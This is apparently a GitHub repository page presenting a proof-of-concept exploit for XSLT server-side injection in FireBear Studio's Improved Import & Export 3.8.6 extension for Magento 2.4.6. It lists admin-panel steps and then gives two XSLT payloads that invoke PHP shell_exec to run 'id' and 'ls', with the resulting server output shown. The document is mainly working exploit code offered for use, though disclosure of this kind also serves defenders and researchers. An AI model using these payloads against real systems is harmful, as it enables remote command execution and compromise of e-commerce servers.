Skip to content

Latest commit

 

History

31 Commits

Folders and files

NameName
Last commit message
Last commit date
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Exploit Title: FireBear Studio Improved Import & Export ver. 3.8.6 for Magento 2.4.6 - XSLT Server Side Injection

Magento Image

Magento Image

## POC
  1. Enter with admin credentials to this URL: https://magento2demo.firebearstudio.com/

  2. Click SYSTEM > Import Jobs > Entity Type Widget > click edit

  3. Choose Import File Type > XML > Import Source is File

  4. Upload any xml file

  5. Click XSLT Configuration and write this payload:

    <?xml version="1.0" encoding="utf-8"?>
    <xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:php="http://php.net/xsl">
      <xsl:template match="/">
        <xsl:value-of select="php:function('shell_exec','id')" />
      </xsl:template>
    </xsl:stylesheet>```
    

** **uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)

   <?xml version="1.0" encoding="utf-8"?>
   <xsl:stylesheet version="1.0"
   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
   xmlns:php="http://php.net/xsl">
     <xsl:template match="/">
       <xsl:value-of select="php:function('shell_exec','ls')" />
     </xsl:template>
   </xsl:stylesheet>```

**<?xml version="1.0"?>
cron.php
errors
get.php
health_check.php
index.php
media
opt
robots.txt
static
static.php

About

Magento ver. 2.4.6 - XSLT Server Side Injection

Resources

Stars

4 stars

Watchers

1 watching

Forks

Releases

Packages

Contributors

Languages